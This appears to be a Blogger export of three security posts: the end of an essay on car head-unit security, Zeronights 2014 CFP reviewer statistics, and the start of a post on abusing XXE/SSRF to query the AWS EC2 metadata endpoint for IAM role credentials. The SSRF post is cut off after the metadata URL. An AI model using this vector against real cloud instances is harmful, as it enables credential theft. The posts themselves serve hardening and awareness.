<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/b89/448/85e/b8944885ed014a078c54a7d82cabcf2c.png" height="467px;" src="https://lh4.googleusercontent.com/WCjXwhP0hZXVSi3JzceHf_o2pa7rqneJbKP4Pc8CeHIkXUAtK7MpmATltHIQUFlxhTur7tKll30tzfOHHBNUDzKBWzwmBY_HnEcBo6-g8raq-ce9SoVYw88bLgoWPLAxofcuxzAZhQbvlQIw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Worm concept in theory.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The future is coming - cars without a driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">And now for something you have seen only in fiction before - robotic cars. The whole world is waiting for self-driving cars to be completely introduced by 2040. So today we are creating the basis for future engineers, and security topics are not in last place. By that time attack vectors and their profit will change. It is hard to predict what the HU will be like in 2040, but we can assume that decision-making and navigation algorithms won’t change completely. I hope that by 2040 all the things that are shown at conferences nowadays will have become ordinary and obligatory for vendors (and, of course, mitigated). I’ve talked to some information security experts in the automotive industry, including German manufacturers, and I assure you that they are up to date on all hacking techniques and are definitely on the right track (but I can’t speak for all of them, of course).</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/f8d/64d/af5/f8d64daf51484b45a6b4343f42107860.jpg" height="344px;" src="https://lh3.googleusercontent.com/rjjahMb9MQ61uafi0slIx1TCVZdnF8w9Pxu5Ntw5b3uBfdlOz1GY90R552erQk5QqJaz-hcdUPis_gzarPYxN-mT8KRfyvAXNkEsR38zQLDs7L_s2QnPxLGr7cd8xkQfU7msJFbAnCPZTx1z" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="600px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is the future as I see it.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Is it as bad as it seems? Have at you now!</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now I would like to talk about basic protection techniques for the HU and the car network. They are quite diverse because some manufacturers see one group of threats and some see another. For example, it is important for the client's HU to get updates. If a bug is found, an update of the whole firmware or of some component should be installed (otherwise a recall of the whole car lot will cost a pretty penny, so over-the-air updates are a good idea). Of course this update process must be secured as well, by using digital signatures, certificates and so on. Anyway, progress in this area is being made and almost all cars will have over-the-air updates, and that's good. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">There is a trend towards isolating the OS from network and hardware resources. Isolation can take different forms: from network segmentation up to full OS virtualization. But problems persist: if the OS needs access to the door lock ECU, cruise control or OBD-II, it will get it, hence there is a way to control door locks and drive mode and to get other information about the car's state. Virtualization hasn't entered our lives completely yet, and today we have quite common problems: absence of ASLR/NX, improper access permissions on local files and so on. A keychain is not installed everywhere, and many applications have to store secret keys on the HU’s filesystem. So secure storage is in demand on IVI in the same way as on smartphones. I have nothing to say about SELinux - I understand that it demands too many resources for an embedded system and I have not seen it on IVI. Also I can't see a reason to have SSH on the HU at the production stage (but it is worth saying that the situation has started to change and now it's more and more difficult to find SSH. Now developers turn it on only during the release stage for their own purposes). A lack of hardening becomes obvious when you see a web browser running as root (but to be honest and fair, developers are fixing these kinds of issues at a very early stage of development, so it should be rare in production now). </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As an aside, it is worth mentioning the problem of integrity. From my point of view, even if someone has executed malicious code on the HU, he or she shouldn't be given any chance to save a backdoor, even with root privileges. Some manufacturers ignore this problem and make it possible to mount the filesystem in rw mode, but some IVIs will reboot on any attempt to change anything in their configuration.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.6666666666667px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Virtualization</b></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's talk about virtualization as a solution to all problems. One of the fundamental protection policies for an OS with entertainment applications, as I've said before, is virtualization. I think that in N years it will be applied by all manufacturers in some way. The advantages are clear: the app OS will be isolated from the main vehicle system and the “important system” OS, including isolation at the network level. But if such an app OS is compromised, an attacker can still get some valuable data. First of all, it will be the user data that is processed at that level. That’s enough to consider this attack successful, because you are getting all the data from the sensors: the location, the endpoint, application data; at the very least, a Facebook access token is worth hacking the HU for! Secondly, some APIs, for example the display UI, will still be accessible from the virtualized OS, and that will allow the attack to continue "down". The virtualization approach seems right to me because it complicates the attacker's task.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/f68/dd2/125/f68dd2125c074fa8b4d9003acc6de869.png" height="454px;" src="https://lh3.googleusercontent.com/dQmJutcOq1nHLi27EXfRn4fJMi08yazLAGCF-HVAWigaf1MTQHuFPuWmpPHFNdL4p4YFEI5qyvYxoekFruGQf3qn1RpUECUCgcz57Y0UREyAspHHHw_MOoWavgRTbnbyeZ9Sk-7472bipFq6" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.6666666666667px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Instead of a </b></span><span style="font-family: 'Segoe UI', sans-serif; font-size: 10pt; line-height: normal;"><b>conclusion</b></span><b style="font-family: Calibri; font-size: 14.6666666666667px; line-height: 1.295; white-space: pre-wrap;">.</b><br />
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> I've written quite a lot but nothing concrete. Nevertheless, my aim was to draw your attention to the key component, the Head Unit (and I mean IVI), and to describe the corresponding risks and what actions vendors and developers take to minimize them. Today there is plenty of information about CAN networks: some resources have shared access, some ECUs are vulnerable to DoS and brute-force attacks, or you can even read data from them. But all these attacks don't have a practical application if you want to perform a "remote attack on a car from the Internet". I only tried to show the current situation in the car industry, the main target and some of its problems (taking into account Connected Car features)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in my humble opinion</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. I didn't want to scare or encourage anyone, so this note is not meant to be a vendor advertisement and was not written to convince you that "wow, hackers can hack everything!". 
But they definitely can, and this summer at Black Hat in Las Vegas the same guys, Charlie and Chris, will show remote penetration of a real car, getting access to CAN and gaining control over a critical ECU - </span><a href="https://www.blackhat.com/us-15/briefings.html#Chris-Valasek" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.blackhat.com/us-15/briefings.html#Chris-Valasek</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. I don't know if the HU is used as the entry point or for privilege escalation, but the show will be spectacular and will demonstrate real capabilities :) Secure driving to you!</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">UPD</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: Now we have more details about Charlie and Chris's attack (</span><a href="http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), and I can say that the HU/IVI system was involved; it looks like Cruise Control and/or access to CAN, but I believe that more technical details will be disclosed at BlackHat!
</span></div>
<div>
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com1tag:blogger.com,1999:blog-4711612808026791519.post-86447290939883283372015-06-22T03:27:00.000-07:002015-07-23T12:58:15.550-07:00Zeronights 2014 CFP. Statistics on the work of the Defcon-Russia group.<div dir="ltr" style="text-align: left;" trbidi="on">
Zeronights 2014 CFP. Statistics on the work of the Defcon-Russia group<br />
Better late than never! I suppose this motto doesn't quite fit, but nevertheless...<br />
I had prepared statistics on the work of our CFP committee and on the talks of the last ZeroNights. Nobody was particularly interested in them, but since I have them, I'll share them.<br />
<br />
So, last year the 4th ZeroNights took place. Here are some statistics that are a bit useless but nevertheless amusing, plus something about what kind of "evil" people sit on the committee from Defcon Russia.<br />
<div>
<br /></div>
<br />
<a name='more'></a><br /><br />
<h3 style="text-align: left;">
Talks</h3>
<br />
We were sent quite a few talks, and by our standards a lot: 58 submissions.<br />
It's nice that foreign speakers are interested in the conference. Let's see how these statistics change in 2015. Nevertheless, at ZN 2012, 56% of the applicants were from abroad, out of about 60 submissions in total. Overall, I consider the interest stable and fairly high, given both the cold month of November and the hassle of getting a Russian visa.<br />
<br />
<br />
Next, the talk topics. We were sent many different topics, and I took the trouble to sort them into categories. Obviously there are overlaps, but I picked the main one for each.<br />
The breadth of interests of our CFP participants is very pleasing.<br />
<br />
<br />
And a little about us, the people on the committee. I noticed a rather interesting tendency: there is definitely a connection between a person's interests and job, their character, and how they work on the CFP. I find this quite interesting. Our CFP can hardly be called impartial, although we try. The thing is that the committee brings together people from different areas of infosec (except paper-security people, unless you count toxa as one), so quite often someone tries to act as the defence lawyer and someone as the prosecutor, and wants to convince the other members that their decision is right. I know that Andrey Petukhov does not support this approach, but I like that the community decides, not just dry statistics, and that everyone has a chance to talk to another member and get to the bottom of the question. As a rule, it turns out that the CFP committee can send the speaker comments, clarifying questions or even requests. In short, here are the statistics on who is the most "evil" and the most "kind", based on the final CFP scores:<br />
<br />
<br />
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: 1px solid #ccc; font-family: arial,sans,sans-serif; font-size: 13px; table-layout: fixed;"><colgroup><col width="133"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col><col width="100"></col></colgroup><tbody>
<tr style="height: 21px;"><td style="border-right: 1px solid #000000; padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"Alexey Sintsov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexey Sintsov</td><td data-sheets-value="[null,2,"Alexandr Polyakov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexandr Polyakov</td><td data-sheets-value="[null,2,"D1g1"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">D1g1</td><td data-sheets-value="[null,2,"Nikita Abdullin"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Nikita Abdullin</td><td data-sheets-value="[null,2,"Stepan Ilyin"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: 
solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Stepan Ilyin</td><td data-sheets-value="[null,2,"Cr4sh"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Cr4sh</td><td data-sheets-value="[null,2,"Alexander Bazhanyuk"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexander Bazhanyuk</td><td data-sheets-value="[null,2,"Alexander Matrosov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">Alexander Matrosov</td><td data-sheets-value="[null,2,"Andrey Petukhov"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; 
vertical-align: bottom;">Andrey Petukhov</td><td data-sheets-value="[null,2,"toxa"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">toxa</td><td data-sheets-value="[null,2,"d0znpp"]" style="background-color: #b7b7b7; border-bottom-color: rgb(0, 0, 0); border-bottom-style: solid; border-bottom-width: 1px; border-right-color: rgb(0, 0, 0); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(0, 0, 0); border-top-style: solid; border-top-width: 1px; font-size: 100%; font-weight: bold; padding: 2px 3px; vertical-align: bottom;">d0znpp</td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"\u0412\u0421\u0415\u0413\u041e"]" style="padding: 2px 3px 2px 3px; vertical-align: bottom;">TOTAL</td><td data-sheets-value="[null,3,null,33]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">33</td><td data-sheets-value="[null,3,null,18]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">18</td><td data-sheets-value="[null,3,null,30]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">30</td><td data-sheets-value="[null,3,null,50]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">50</td><td data-sheets-value="[null,3,null,7]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">7</td><td data-sheets-value="[null,3,null,53]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">53</td><td data-sheets-value="[null,3,null,15]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">15</td><td data-sheets-value="[null,3,null,54]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">54</td><td data-sheets-value="[null,3,null,45]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">45</td><td data-sheets-value="[null,3,null,4]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">4</td><td data-sheets-value="[null,3,null,41]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">41</td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"\u041f\u041e\u041b\u041e\u0416"]" style="padding: 2px 3px 2px 3px; vertical-align: bottom;"><h3>
<span style="color: lime;"> <b>+</b></span></h3>
</td><td data-sheets-value="[null,3,null,25]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">25</td><td data-sheets-value="[null,3,null,6]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">6</td><td data-sheets-value="[null,3,null,26]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">26</td><td data-sheets-value="[null,3,null,26]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">26</td><td data-sheets-value="[null,3,null,4]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">4</td><td data-sheets-value="[null,3,null,23]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">23</td><td data-sheets-value="[null,3,null,8]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">8</td><td data-sheets-value="[null,3,null,35]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">35</td><td data-sheets-value="[null,3,null,24]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">24</td><td data-sheets-value="[null,3,null,2]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">2</td><td data-sheets-value="[null,3,null,18]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">18</td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"\u041d\u0415\u0413\u0410\u0422\u0418\u0412"]" style="padding: 2px 3px 2px 3px; vertical-align: bottom;"><h3>
<span style="color: red;">-</span></h3>
</td><td data-sheets-value="[null,3,null,8]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">8</td><td data-sheets-value="[null,3,null,13]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">13</td><td data-sheets-value="[null,3,null,4]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">4</td><td data-sheets-value="[null,3,null,24]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">24</td><td data-sheets-value="[null,3,null,3]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">3</td><td data-sheets-value="[null,3,null,30]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">30</td><td data-sheets-value="[null,3,null,7]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">7</td><td data-sheets-value="[null,3,null,19]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">19</td><td data-sheets-value="[null,3,null,21]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">21</td><td data-sheets-value="[null,3,null,2]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">2</td><td data-sheets-value="[null,3,null,23]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">23</td></tr>
<tr style="height: 21px;"><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;">Kindness ratio</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.7575757575757576]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,76</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.3333333333333333]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,33</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.8666666666666667]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,87</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.52]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,52</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5714285714285714]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,57</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.4339622641509434]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,43</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5333333333333333]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,53</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.6481481481481481]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,65</td><td 
data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5333333333333333]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,53</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.5]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,50</td><td data-sheets-formula="=(R[-2]C[0]/R[-3]C[0])" data-sheets-numberformat="[null,2,"0.00",1]" data-sheets-value="[null,3,null,0.43902439024390244]" style="padding: 2px 3px 2px 3px; text-align: right; vertical-align: bottom;">0,44</td></tr>
</tbody></table>
<br />
<br />
I never would have thought that D1g1 is the kindest!<br />
<br />
All the best to everyone, guys, and thanks to the CFP committee for their contribution to the cause 8)</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-52664864258055467502014-08-08T06:15:00.004-07:002014-08-09T03:18:15.287-07:00SSRF vs AWS Security<div dir="ltr" style="text-align: left;" trbidi="on">
Hello everyone... <br />
<br />
Just want to mention one attack vector that is useful against AWS EC2 instances in some configurations. It is not rocket science, but it is pretty fun, tells us something about AWS cloud security, and may help us with hardening. I am talking about the boring old SSRF vector. So if an attacker can do SSRF against our EC2 instance, what can he do?<br />
<br />
Sometimes developers like to assign IAM Roles to instances. For example, a deploy/build server that needs to create new apps in the AWS account, or something else, it doesn't matter - this just happens 8) Assigning a role to an EC2 instance is the easiest way to do it, because you do not need to think about how to deliver Access Keys to the instance, how to rotate them, etc. Now back to SSRF...<br />
<br />
So we have a classic vulnerable app with a boring XXE:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKQjxGgmTsJ6sCPISgYDePSK2Calzn6xE0j81BDxKL7Ss0vlHsGPljbJjGjgV8y1DTKIxIK6GOR3bMsbBInBeC8xq3T6g1ncORnm2C-h93cTa6Pj7CrYVxEOD6G3NKyr8jWLrZSek8KX3o/s1600/AWS-XXE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKQjxGgmTsJ6sCPISgYDePSK2Calzn6xE0j81BDxKL7Ss0vlHsGPljbJjGjgV8y1DTKIxIK6GOR3bMsbBInBeC8xq3T6g1ncORnm2C-h93cTa6Pj7CrYVxEOD6G3NKyr8jWLrZSek8KX3o/s1600/AWS-XXE.png" height="175" width="400" /></a></div>
<br />
And...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbekaBXuGri5vKlsAJ8vet4GmomjDS7KRYLdDuBFFDISaMKx5YDPieyiUHXFv8G75W4qilS3f3dunJm7L0YJ8kkAei3wO9vqZFVodVy-w6xjVdoPc9Pdi_mmhSHo3egmM-uoedAlyHI10c/s1600/AWS-XXE-CLASSIC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbekaBXuGri5vKlsAJ8vet4GmomjDS7KRYLdDuBFFDISaMKx5YDPieyiUHXFv8G75W4qilS3f3dunJm7L0YJ8kkAei3wO9vqZFVodVy-w6xjVdoPc9Pdi_mmhSHo3egmM-uoedAlyHI10c/s1600/AWS-XXE-CLASSIC.png" height="191" width="400" /></a></div>
<br />
<br />
<a name='more'></a><br />
<br />
Now it's time to remember the AWS meta-data service, which is available from any instance. This service returns meta-data for the EC2 instance that called the API: http://169.254.169.254/latest/meta-data<br />
Let's try:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
